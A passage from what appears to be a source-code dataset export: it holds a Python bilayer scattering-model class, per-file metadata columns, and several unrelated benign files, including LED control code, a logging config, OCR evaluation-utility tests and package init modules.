rhoGuestOut, zGuestOut, sigmaGuestOut,
x_oligolam, dbilayer, ddbilayer, Nbilayer, Ndistrib)
def visualize(self, fig:Figure, x:Union[np.ndarray, float], *args, **kwargs):
(A, bg, R0, dR,
rhoGuestIn, zGuestIn, sigmaGuestIn,
rhoHead, zHead, sigmaHead,
sigmaTail,
rhoGuestOut, zGuestOut, sigmaGuestOut,
x_oligolam,
dbilayer, ddbilayer,
Nbilayer, Ndistrib
) = args
return super().visualize(fig, x, A, bg, R0, dR, rhoGuestIn, zGuestIn, sigmaGuestIn,
rhoHead, zHead, sigmaHead,
sigmaTail,
rhoHead, zHead, sigmaHead,
rhoGuestOut, zGuestOut, sigmaGuestOut,
x_oligolam, dbilayer, ddbilayer, Nbilayer, Ndistrib)
class GaussianBilayerSymm(GaussianBilayerAsymm):
name = 'gaussian_bilayer_symm'
description = 'Symmetric gaussian bilayer with symmetric guest layers'
parameters = [ParameterDefinition('A', 'outer intensity scaling factor', 1, lbound=0),
ParameterDefinition('bg', 'constant background', 0, lbound=0),
ParameterDefinition('R0', 'radius of the innermost bilayer', 40, lbound=0),
ParameterDefinition('dR', 'hwhm of the radius of the innermost bilayer', 5, lbound=0),
ParameterDefinition('rhoGuest',
'relative electron density of the guest molecule layers (tail is -1)', 0),
ParameterDefinition('zGuest', 'distance of the guest molecule layers from the bilayer center',
10, lbound=0),
ParameterDefinition('sigmaGuest', 'HWHM of the guest molecule layers', 5, lbound=0),
ParameterDefinition('rhoHead', 'relative electron density of the headgroup layers (tail is -1)', 1),
ParameterDefinition('zHead', 'distance of the headgroup layers from the bilayer center',
2.5, lbound=0),
ParameterDefinition('sigmaHead', 'HWHM of the headgroup layers', 5, lbound=0),
ParameterDefinition('sigmaTail', 'HWHM of the tail layer', 1, lbound=0),
ParameterDefinition('x_oligolam', 'Proportion of oligolamellarity', 0.5, lbound=0, ubound=1),
ParameterDefinition('dbilayer', 'Periodic repeat distance of the bilayers', 6.4, lbound=0),
ParameterDefinition('ddbilayer', 'HWHM of the periodic repeat distance of the bilayers', 0.1,
lbound=0),
ParameterDefinition('Nbilayer', 'Number of bilayers', 2, lbound=1, fittable=False, coerce_type=int),
ParameterDefinition('Ndistrib', 'Size distribution integration count', 70, lbound=1, fittable=False,
coerce_type=int),
]
def fitfunction(self, x: Union[np.ndarray, float], *args, **kwargs):
(A, bg, R0, dR,
rhoGuest, zGuest, sigmaGuest,
rhoHead, zHead, sigmaHead,
sigmaTail,
x_oligolam,
dbilayer, ddbilayer,
Nbilayer, Ndistrib
) = args
return super().fitfunction(x, A, bg, R0, dR, rhoGuest, zGuest, sigmaGuest,
rhoHead, zHead, sigmaHead,
sigmaTail,
rhoHead, zHead, sigmaHead,
rhoGuest, zGuest, sigmaGuest,
x_oligolam, dbilayer, ddbilayer, Nbilayer, Ndistrib)
def visualize(self, fig: Figure, x: Union[np.ndarray, float], *args, **kwargs):
(A, bg, R0, dR,
rhoGuest, zGuest, sigmaGuest,
rhoHead, zHead, sigmaHead,
sigmaTail,
x_oligolam,
dbilayer, ddbilayer,
Nbilayer, Ndistrib
) = args
return super().visualize(fig, x, A, bg, R0, dR, rhoGuest, zGuest, sigmaGuest,
rhoHead, zHead, sigmaHead,
sigmaTail,
rhoHead, zHead, sigmaHead,
rhoGuest, zGuest, sigmaGuest,
x_oligolam, dbilayer, ddbilayer, Nbilayer, Ndistrib)
| 59.05
| 136
| 0.566681
| 1,378
| 14,172
| 5.800435
| 0.144412
| 0.030026
| 0.126861
| 0.037158
| 0.815964
| 0.785562
| 0.773677
| 0.750782
| 0.744777
| 0.697736
| 0
| 0.027113
| 0.336367
| 14,172
| 239
| 137
| 59.297071
| 0.822754
| 0.005151
| 0
| 0.580357
| 0
| 0
| 0.229198
| 0.005037
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.026786
| 0
| 0.15625
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8c8e5669d1e87fb834f003af9ce89b2e8f8e6674
| 36
|
py
|
Python
|
pyqt_style_setter/__init__.py
|
yjg30737/pyqt_style_setter
|
2d3db7fd7ed71dd4b2644c868029f9913841b648
|
[
"MIT"
] | null | null | null |
pyqt_style_setter/__init__.py
|
yjg30737/pyqt_style_setter
|
2d3db7fd7ed71dd4b2644c868029f9913841b648
|
[
"MIT"
] | null | null | null |
pyqt_style_setter/__init__.py
|
yjg30737/pyqt_style_setter
|
2d3db7fd7ed71dd4b2644c868029f9913841b648
|
[
"MIT"
] | null | null | null |
from .styleSetter import StyleSetter
| 36
| 36
| 0.888889
| 4
| 36
| 8
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 36
| 1
| 36
| 36
| 0.969697
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8c9ab2b3f8283aa6ee867d4ec188e306d5860b00
| 441
|
py
|
Python
|
tests/discovery/test_motioneye.py
|
pnjongang/supervisor
|
2a006ae76de4b06e3e291b37aa2a4e14dc272445
|
[
"Apache-2.0"
] | 597
|
2017-04-27T15:10:08.000Z
|
2019-12-18T16:02:57.000Z
|
tests/discovery/test_motioneye.py
|
pnjongang/supervisor
|
2a006ae76de4b06e3e291b37aa2a4e14dc272445
|
[
"Apache-2.0"
] | 799
|
2017-05-02T00:26:07.000Z
|
2019-12-18T21:40:18.000Z
|
tests/discovery/test_motioneye.py
|
pnjongang/supervisor
|
2a006ae76de4b06e3e291b37aa2a4e14dc272445
|
[
"Apache-2.0"
] | 173
|
2017-04-26T17:03:42.000Z
|
2019-12-15T10:41:57.000Z
|
"""Test motionEye discovery."""
import pytest
import voluptuous as vol
from supervisor.discovery.validate import valid_discovery_config
def test_good_config() -> None:
"""Test good motionEye config."""
valid_discovery_config("motioneye", {"url": "http://example.com:1234"})
def test_bad_config() -> None:
"""Test bad motionEye config."""
with pytest.raises(vol.Invalid):
valid_discovery_config("motioneye", {})
| 24.5
| 75
| 0.709751
| 53
| 441
| 5.716981
| 0.471698
| 0.138614
| 0.19802
| 0.191419
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010667
| 0.14966
| 441
| 17
| 76
| 25.941176
| 0.797333
| 0.181406
| 0
| 0
| 0
| 0
| 0.127536
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.375
| 0
| 0.625
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
8cc5584839c1c6356456528af689164edcad2ed7
| 1,530
|
py
|
Python
|
archive/LEDs.py
|
Guillermo-Hidalgo-Gadea/RPi4Toolbox
|
47a265aa9828f144155c097efc8ff36bd435099f
|
[
"MIT"
] | null | null | null |
archive/LEDs.py
|
Guillermo-Hidalgo-Gadea/RPi4Toolbox
|
47a265aa9828f144155c097efc8ff36bd435099f
|
[
"MIT"
] | null | null | null |
archive/LEDs.py
|
Guillermo-Hidalgo-Gadea/RPi4Toolbox
|
47a265aa9828f144155c097efc8ff36bd435099f
|
[
"MIT"
] | 1
|
2021-10-15T16:14:48.000Z
|
2021-10-15T16:14:48.000Z
|
from blinkstick import blinkstick
class LED:
def __init__(self):
LEDlist = blinkstick.find_all()
self.LED1 = LEDlist[0]
self.LED2 = LEDlist[1]
def on(self):
self.LED1.set_color(0,0,255,0,0)
self.LED1.set_color(0,1,255,0,0)
self.LED1.set_color(0,2,255,0,0)
self.LED1.set_color(0,3,255,0,0)
self.LED1.set_color(0,4,255,0,0)
self.LED1.set_color(0,5,255,0,0)
self.LED1.set_color(0,6,255,0,0)
self.LED1.set_color(0,7,255,0,0)
self.LED2.set_color(0,0,255,0,0)
self.LED2.set_color(0,1,255,0,0)
self.LED2.set_color(0,2,255,0,0)
self.LED2.set_color(0,3,255,0,0)
self.LED2.set_color(0,4,255,0,0)
self.LED2.set_color(0,5,255,0,0)
self.LED2.set_color(0,6,255,0,0)
self.LED2.set_color(0,7,255,0,0)
def off(self):
self.LED1.set_color(0,0,0,0,0)
self.LED1.set_color(0,1,0,0,0)
self.LED1.set_color(0,2,0,0,0)
self.LED1.set_color(0,3,0,0,0)
self.LED1.set_color(0,4,0,0,0)
self.LED1.set_color(0,5,0,0,0)
self.LED1.set_color(0,6,0,0,0)
self.LED1.set_color(0,7,0,0,0)
self.LED2.set_color(0,0,0,0,0)
self.LED2.set_color(0,1,0,0,0)
self.LED2.set_color(0,2,0,0,0)
self.LED2.set_color(0,3,0,0,0)
self.LED2.set_color(0,4,0,0,0)
self.LED2.set_color(0,5,0,0,0)
self.LED2.set_color(0,6,0,0,0)
self.LED2.set_color(0,7,0,0,0)
| 32.553191
| 41
| 0.565359
| 315
| 1,530
| 2.628571
| 0.08254
| 0.130435
| 0.347826
| 0.309179
| 0.859903
| 0.859903
| 0.859903
| 0.821256
| 0
| 0
| 0
| 0.199475
| 0.252941
| 1,530
| 46
| 42
| 33.26087
| 0.524934
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.075
| false
| 0
| 0.025
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8cd9f21a5ddd5824f31e827fe7fd55943ff05ef5
| 3,773
|
py
|
Python
|
get_config.py
|
0dminnimda/NTO_bigdata_2020_final
|
db866b59782513d39d9ceabdbc4ebb69cd638872
|
[
"MIT"
] | null | null | null |
get_config.py
|
0dminnimda/NTO_bigdata_2020_final
|
db866b59782513d39d9ceabdbc4ebb69cd638872
|
[
"MIT"
] | null | null | null |
get_config.py
|
0dminnimda/NTO_bigdata_2020_final
|
db866b59782513d39d9ceabdbc4ebb69cd638872
|
[
"MIT"
] | null | null | null |
# import yaml
# print(yaml.safe_load("""---
# version: 1
# disable_existing_loggers: False
# formatters:
# simple:
# format: '[%(levelname)s] [%(asctime)s:%(name)s] %(message)s'
# handlers:
# console:
# class: logging.StreamHandler
# level: WARNING
# formatter: simple
# stream: ext://sys.stdout
# file_handler:
# class: logging.FileHandler
# level: DEBUG
# formatter: simple
# filename: autosklearn.log
# distributed_logfile:
# class: logging.FileHandler
# level: DEBUG
# formatter: simple
# filename: distributed.log
# root:
# level: CRITICAL
# handlers: [console, file_handler]
# loggers:
# autosklearn.metalearning:
# level: NOTSET
# handlers: [file_handler]
# propagate: no
# autosklearn.automl_common.common.utils.backend:
# level: DEBUG
# handlers: [file_handler]
# propagate: no
# smac.intensification.intensification.Intensifier:
# level: INFO
# handlers: [file_handler, console]
# smac.optimizer.local_search.LocalSearch:
# level: INFO
# handlers: [file_handler, console]
# smac.optimizer.smbo.SMBO:
# level: INFO
# handlers: [file_handler, console]"""))
# {'version': 1, 'disable_existing_loggers': False,
# 'formatters':
# {'simple': {'format': '[%(levelname)s] [%(asctime)s:%(name)s] %(message)s'}},
# 'handlers':
# {
# 'console':
# {'class': 'logging.StreamHandler', 'level': 'WARNING', 'formatter': 'simple',
# 'stream': 'ext://sys.stdout'},
# 'file_handler':
# {'class': 'logging.FileHandler', 'level': 'DEBUG', 'formatter': 'simple',
# 'filename': 'autosklearn.log'},
# 'distributed_logfile':
# {'class': 'logging.FileHandler', 'level': 'DEBUG', 'formatter': 'simple',
# 'filename': 'distributed.log'}},
# 'root': {'level': 'CRITICAL', 'handlers': ['console', 'file_handler']},
# 'loggers':
# {
# 'autosklearn.metalearning':
# {'level': 'NOTSET', 'handlers': ['file_handler'],
# 'propagate': False},
# 'autosklearn.automl_common.common.utils.backend':
# {'level': 'DEBUG', 'handlers': ['file_handler'],
# 'propagate': False},
# 'smac.intensification.intensification.Intensifier':
# {'level': 'INFO', 'handlers': ['file_handler', 'console']},
# 'smac.optimizer.local_search.LocalSearch':
# {'level': 'INFO', 'handlers': ['file_handler', 'console']},
# 'smac.optimizer.smbo.SMBO':
# {'level': 'INFO', 'handlers': ['file_handler', 'console']}}}
config = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"simple": {"format": "[%(levelname)s] [%(asctime)s:%(name)s] %(message)s"}
},
"handlers": {
"console": {
"class": "logging.StreamHandler",
"level": "INFO",
"formatter": "simple",
"stream": "ext://sys.stdout",
},
},
# "root": {"level": "CRITICAL", "handlers": ["console", "file_handler"]},
"loggers": {
"autosklearn.metalearning": {
"level": "NOTSET",
"handlers": ["file_handler"],
"propagate": False,
},
"autosklearn.automl_common.common.utils.backend": {
"level": "DEBUG",
"handlers": ["file_handler"],
"propagate": False,
},
"smac.intensification.intensification.Intensifier": {
"level": "INFO",
"handlers": ["file_handler", "console"],
},
"smac.optimizer.local_search.LocalSearch": {
"level": "INFO",
"handlers": ["file_handler", "console"],
},
"smac.optimizer.smbo.SMBO": {
"level": "INFO",
"handlers": ["file_handler", "console"],
},
},
}
| 29.476563
| 84
| 0.566393
| 328
| 3,773
| 6.408537
| 0.182927
| 0.104662
| 0.135585
| 0.089914
| 0.982398
| 0.980495
| 0.964795
| 0.964795
| 0.964795
| 0.964795
| 0
| 0.001047
| 0.240657
| 3,773
| 127
| 85
| 29.708661
| 0.732635
| 0.64458
| 0
| 0.282051
| 0
| 0
| 0.44664
| 0.196047
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
50e5608bd3ac9a30f8f952faa5f24c99bdaefef7
| 82
|
py
|
Python
|
hello_test.py
|
wisdombeyonddata/tell
|
b81e870add61e06056373f283511ae805f697817
|
[
"MIT"
] | null | null | null |
hello_test.py
|
wisdombeyonddata/tell
|
b81e870add61e06056373f283511ae805f697817
|
[
"MIT"
] | null | null | null |
hello_test.py
|
wisdombeyonddata/tell
|
b81e870add61e06056373f283511ae805f697817
|
[
"MIT"
] | null | null | null |
import hello;
def test_hello():
assert hello.hello_world() == "Hello World!"
| 16.4
| 48
| 0.682927
| 11
| 82
| 4.909091
| 0.545455
| 0.37037
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170732
| 82
| 4
| 49
| 20.5
| 0.794118
| 0
| 0
| 0
| 0
| 0
| 0.146341
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
50fbdd4da9bd4138015329cdbbe84bc2f5e40584
| 14,258
|
py
|
Python
|
tests/test_metrics/test_eval_utils.py
|
Yuliang-Liu/mmocr
|
d683b142838c2e25cbff35191ed189bbb3790fff
|
[
"Apache-2.0"
] | null | null | null |
tests/test_metrics/test_eval_utils.py
|
Yuliang-Liu/mmocr
|
d683b142838c2e25cbff35191ed189bbb3790fff
|
[
"Apache-2.0"
] | null | null | null |
tests/test_metrics/test_eval_utils.py
|
Yuliang-Liu/mmocr
|
d683b142838c2e25cbff35191ed189bbb3790fff
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) OpenMMLab. All rights reserved.
"""Tests the utils of evaluation."""
import numpy as np
import pytest
import mmocr.core.evaluation.utils as utils
def test_ignore_pred():
# test invalid arguments
box = [0, 0, 1, 0, 1, 1, 0, 1]
det_boxes = [box]
gt_dont_care_index = [0]
gt_polys = [utils.points2polygon(box)]
precision_thr = 0.5
with pytest.raises(AssertionError):
det_boxes_tmp = 1
utils.ignore_pred(det_boxes_tmp, gt_dont_care_index, gt_polys,
precision_thr)
with pytest.raises(AssertionError):
gt_dont_care_index_tmp = 1
utils.ignore_pred(det_boxes, gt_dont_care_index_tmp, gt_polys,
precision_thr)
with pytest.raises(AssertionError):
gt_polys_tmp = 1
utils.ignore_pred(det_boxes, gt_dont_care_index, gt_polys_tmp,
precision_thr)
with pytest.raises(AssertionError):
precision_thr_tmp = 1.1
utils.ignore_pred(det_boxes, gt_dont_care_index, gt_polys,
precision_thr_tmp)
# test ignored cases
result = utils.ignore_pred(det_boxes, gt_dont_care_index, gt_polys,
precision_thr)
assert result[2] == [0]
# test unignored cases
gt_dont_care_index_tmp = []
result = utils.ignore_pred(det_boxes, gt_dont_care_index_tmp, gt_polys,
precision_thr)
assert result[2] == []
det_boxes_tmp = [[10, 10, 15, 10, 15, 15, 10, 15]]
result = utils.ignore_pred(det_boxes_tmp, gt_dont_care_index, gt_polys,
precision_thr)
assert result[2] == []
def test_compute_hmean():
# test invalid arguments
with pytest.raises(AssertionError):
utils.compute_hmean(0, 0, 0.0, 0)
with pytest.raises(AssertionError):
utils.compute_hmean(0, 0, 0, 0.0)
with pytest.raises(AssertionError):
utils.compute_hmean([1], 0, 0, 0)
with pytest.raises(AssertionError):
utils.compute_hmean(0, [1], 0, 0)
_, _, hmean = utils.compute_hmean(2, 2, 2, 2)
assert hmean == 1
_, _, hmean = utils.compute_hmean(0, 0, 2, 2)
assert hmean == 0
def test_points2polygon():
# test unsupported type
with pytest.raises(AssertionError):
points = 2
utils.points2polygon(points)
# test unsupported size
with pytest.raises(AssertionError):
points = [1, 2, 3, 4, 5, 6, 7]
utils.points2polygon(points)
with pytest.raises(AssertionError):
points = [1, 2, 3, 4, 5, 6]
utils.points2polygon(points)
# test np.array
points = np.array([1, 2, 3, 4, 5, 6, 7, 8])
poly = utils.points2polygon(points)
assert poly.nPoints() == 4
points = [1, 2, 3, 4, 5, 6, 7, 8]
poly = utils.points2polygon(points)
assert poly.nPoints() == 4
def test_poly_intersection():
# test unsupported type
with pytest.raises(AssertionError):
utils.poly_intersection(0, 1)
# test non-overlapping polygons
points = [0, 0, 0, 1, 1, 1, 1, 0]
points1 = [10, 20, 30, 40, 50, 60, 70, 80]
poly = utils.points2polygon(points)
poly1 = utils.points2polygon(points1)
area_inters, _ = utils.poly_intersection(poly, poly1)
assert area_inters == 0
# test overlapping polygons
area_inters, _ = utils.poly_intersection(poly, poly)
assert area_inters == 1
def test_poly_union():
# test unsupported type
with pytest.raises(AssertionError):
utils.poly_union(0, 1)
# test non-overlapping polygons
points = [0, 0, 0, 1, 1, 1, 1, 0]
points1 = [2, 2, 2, 3, 3, 3, 3, 2]
poly = utils.points2polygon(points)
poly1 = utils.points2polygon(points1)
assert utils.poly_union(poly, poly1) == 2
# test overlapping polygons
assert utils.poly_union(poly, poly) == 1
def test_poly_iou():
# test unsupported type
with pytest.raises(AssertionError):
utils.poly_iou([1], [2])
points = [0, 0, 0, 1, 1, 1, 1, 0]
points1 = [10, 20, 30, 40, 50, 60, 70, 80]
poly = utils.points2polygon(points)
poly1 = utils.points2polygon(points1)
assert utils.poly_iou(poly, poly1) == 0
# test overlapping polygons
assert utils.poly_iou(poly, poly) == 1
def test_boundary_iou():
points = [0, 0, 0, 1, 1, 1, 1, 0]
points1 = [10, 20, 30, 40, 50, 60, 70, 80]
assert utils.boundary_iou(points, points1) == 0
# test overlapping boundaries
assert utils.boundary_iou(points, points) == 1
def test_points_center():
# test unsupported type
with pytest.raises(AssertionError):
utils.points_center([1])
with pytest.raises(AssertionError):
points = np.array([1, 2, 3])
utils.points_center(points)
points = np.array([1, 2, 3, 4])
assert np.array_equal(utils.points_center(points), np.array([2, 3]))
def test_point_distance():
# test unsupported type
with pytest.raises(AssertionError):
utils.point_distance([1, 2], [1, 2])
with pytest.raises(AssertionError):
p = np.array([1, 2, 3])
utils.point_distance(p, p)
p = np.array([1, 2])
assert utils.point_distance(p, p) == 0
p1 = np.array([2, 2])
assert utils.point_distance(p, p1) == 1
def test_box_center_distance():
p1 = np.array([1, 1, 3, 3])
p2 = np.array([2, 2, 4, 2])
assert utils.box_center_distance(p1, p2) == 1
def test_box_diag():
# test unsupported type
with pytest.raises(AssertionError):
utils.box_diag([1, 2])
with pytest.raises(AssertionError):
utils.box_diag(np.array([1, 2, 3, 4]))
box = np.array([0, 0, 1, 1, 0, 10, -10, 0])
assert utils.box_diag(box) == 10
def test_one2one_match_ic13():
gt_id = 0
det_id = 0
recall_mat = np.array([[1, 0], [0, 0]])
precision_mat = np.array([[1, 0], [0, 0]])
recall_thr = 0.5
precision_thr = 0.5
# test invalid arguments.
with pytest.raises(AssertionError):
utils.one2one_match_ic13(0.0, det_id, recall_mat, precision_mat,
recall_thr, precision_thr)
with pytest.raises(AssertionError):
utils.one2one_match_ic13(gt_id, 0.0, recall_mat, precision_mat,
recall_thr, precision_thr)
with pytest.raises(AssertionError):
utils.one2one_match_ic13(gt_id, det_id, [0, 0], precision_mat,
recall_thr, precision_thr)
with pytest.raises(AssertionError):
utils.one2one_match_ic13(gt_id, det_id, recall_mat, [0, 0], recall_thr,
precision_thr)
with pytest.raises(AssertionError):
utils.one2one_match_ic13(gt_id, det_id, recall_mat, precision_mat, 1.1,
precision_thr)
with pytest.raises(AssertionError):
utils.one2one_match_ic13(gt_id, det_id, recall_mat, precision_mat,
recall_thr, 1.1)
assert utils.one2one_match_ic13(gt_id, det_id, recall_mat, precision_mat,
recall_thr, precision_thr)
recall_mat = np.array([[1, 0], [0.6, 0]])
precision_mat = np.array([[1, 0], [0.6, 0]])
assert not utils.one2one_match_ic13(
gt_id, det_id, recall_mat, precision_mat, recall_thr, precision_thr)
recall_mat = np.array([[1, 0.6], [0, 0]])
precision_mat = np.array([[1, 0.6], [0, 0]])
assert not utils.one2one_match_ic13(
gt_id, det_id, recall_mat, precision_mat, recall_thr, precision_thr)
def test_one2many_match_ic13():
gt_id = 0
recall_mat = np.array([[1, 0], [0, 0]])
precision_mat = np.array([[1, 0], [0, 0]])
recall_thr = 0.5
precision_thr = 0.5
gt_match_flag = [0, 0]
det_match_flag = [0, 0]
det_dont_care_index = []
# test invalid arguments.
with pytest.raises(AssertionError):
gt_id_tmp = 0.0
utils.one2many_match_ic13(gt_id_tmp, recall_mat, precision_mat,
recall_thr, precision_thr, gt_match_flag,
det_match_flag, det_dont_care_index)
with pytest.raises(AssertionError):
recall_mat_tmp = [1, 0]
utils.one2many_match_ic13(gt_id, recall_mat_tmp, precision_mat,
recall_thr, precision_thr, gt_match_flag,
det_match_flag, det_dont_care_index)
with pytest.raises(AssertionError):
precision_mat_tmp = [1, 0]
utils.one2many_match_ic13(gt_id, recall_mat, precision_mat_tmp,
recall_thr, precision_thr, gt_match_flag,
det_match_flag, det_dont_care_index)
with pytest.raises(AssertionError):
utils.one2many_match_ic13(gt_id, recall_mat, precision_mat, 1.1,
precision_thr, gt_match_flag, det_match_flag,
det_dont_care_index)
with pytest.raises(AssertionError):
utils.one2many_match_ic13(gt_id, recall_mat, precision_mat, recall_thr,
1.1, gt_match_flag, det_match_flag,
det_dont_care_index)
with pytest.raises(AssertionError):
gt_match_flag_tmp = np.array([0, 1])
utils.one2many_match_ic13(gt_id, recall_mat, precision_mat, recall_thr,
precision_thr, gt_match_flag_tmp,
det_match_flag, det_dont_care_index)
with pytest.raises(AssertionError):
det_match_flag_tmp = np.array([0, 1])
utils.one2many_match_ic13(gt_id, recall_mat, precision_mat, recall_thr,
precision_thr, gt_match_flag,
det_match_flag_tmp, det_dont_care_index)
with pytest.raises(AssertionError):
det_dont_care_index_tmp = np.array([0, 1])
utils.one2many_match_ic13(gt_id, recall_mat, precision_mat, recall_thr,
precision_thr, gt_match_flag, det_match_flag,
det_dont_care_index_tmp)
# test matched case
result = utils.one2many_match_ic13(gt_id, recall_mat, precision_mat,
recall_thr, precision_thr,
gt_match_flag, det_match_flag,
det_dont_care_index)
assert result[0]
assert result[1] == [0]
# test unmatched case
gt_match_flag_tmp = [1, 0]
result = utils.one2many_match_ic13(gt_id, recall_mat, precision_mat,
recall_thr, precision_thr,
gt_match_flag_tmp, det_match_flag,
det_dont_care_index)
assert not result[0]
assert result[1] == []
def test_many2one_match_ic13():
det_id = 0
recall_mat = np.array([[1, 0], [0, 0]])
precision_mat = np.array([[1, 0], [0, 0]])
recall_thr = 0.5
precision_thr = 0.5
gt_match_flag = [0, 0]
det_match_flag = [0, 0]
gt_dont_care_index = []
# test invalid arguments.
with pytest.raises(AssertionError):
det_id_tmp = 1.0
utils.many2one_match_ic13(det_id_tmp, recall_mat, precision_mat,
recall_thr, precision_thr, gt_match_flag,
det_match_flag, gt_dont_care_index)
with pytest.raises(AssertionError):
recall_mat_tmp = [[1, 0], [0, 0]]
utils.many2one_match_ic13(det_id, recall_mat_tmp, precision_mat,
recall_thr, precision_thr, gt_match_flag,
det_match_flag, gt_dont_care_index)
with pytest.raises(AssertionError):
precision_mat_tmp = [[1, 0], [0, 0]]
utils.many2one_match_ic13(det_id, recall_mat, precision_mat_tmp,
recall_thr, precision_thr, gt_match_flag,
det_match_flag, gt_dont_care_index)
with pytest.raises(AssertionError):
recall_thr_tmp = 1.1
utils.many2one_match_ic13(det_id, recall_mat, precision_mat,
recall_thr_tmp, precision_thr, gt_match_flag,
det_match_flag, gt_dont_care_index)
with pytest.raises(AssertionError):
precision_thr_tmp = 1.1
utils.many2one_match_ic13(det_id, recall_mat, precision_mat,
recall_thr, precision_thr_tmp, gt_match_flag,
det_match_flag, gt_dont_care_index)
with pytest.raises(AssertionError):
gt_match_flag_tmp = np.array([0, 1])
utils.many2one_match_ic13(det_id, recall_mat, precision_mat,
recall_thr, precision_thr, gt_match_flag_tmp,
det_match_flag, gt_dont_care_index)
with pytest.raises(AssertionError):
det_match_flag_tmp = np.array([0, 1])
utils.many2one_match_ic13(det_id, recall_mat, precision_mat,
recall_thr, precision_thr, gt_match_flag,
det_match_flag_tmp, gt_dont_care_index)
with pytest.raises(AssertionError):
gt_dont_care_index_tmp = np.array([0, 1])
utils.many2one_match_ic13(det_id, recall_mat, precision_mat,
recall_thr, precision_thr, gt_match_flag,
det_match_flag, gt_dont_care_index_tmp)
# test matched cases
result = utils.many2one_match_ic13(det_id, recall_mat, precision_mat,
recall_thr, precision_thr,
gt_match_flag, det_match_flag,
gt_dont_care_index)
assert result[0]
assert result[1] == [0]
# test unmatched cases
gt_dont_care_index = [0]
result = utils.many2one_match_ic13(det_id, recall_mat, precision_mat,
recall_thr, precision_thr,
gt_match_flag, det_match_flag,
gt_dont_care_index)
assert not result[0]
assert result[1] == []
| 36.465473
| 79
| 0.596788
| 1,848
| 14,258
| 4.288961
| 0.056277
| 0.012869
| 0.084784
| 0.15897
| 0.863235
| 0.8216
| 0.77782
| 0.753091
| 0.713727
| 0.665657
| 0
| 0.051173
| 0.306495
| 14,258
| 390
| 80
| 36.558974
| 0.750405
| 0.046921
| 0
| 0.57193
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25614
| 1
| 0.049123
| false
| 0
| 0.010526
| 0
| 0.059649
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0fcec5df484fa1f1d03d95f9c10307f07c2773f9
| 655
|
py
|
Python
|
sdk/python/pulumi_oci/databasemigration/__init__.py
|
EladGabay/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2021-08-17T11:14:46.000Z
|
2021-12-31T02:07:03.000Z
|
sdk/python/pulumi_oci/databasemigration/__init__.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-09-06T11:21:29.000Z
|
2021-09-06T11:21:29.000Z
|
sdk/python/pulumi_oci/databasemigration/__init__.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2021-08-24T23:31:30.000Z
|
2022-01-02T19:26:54.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from .. import _utilities
import typing
# Export this package's modules as members:
from .agent import *
from .connection import *
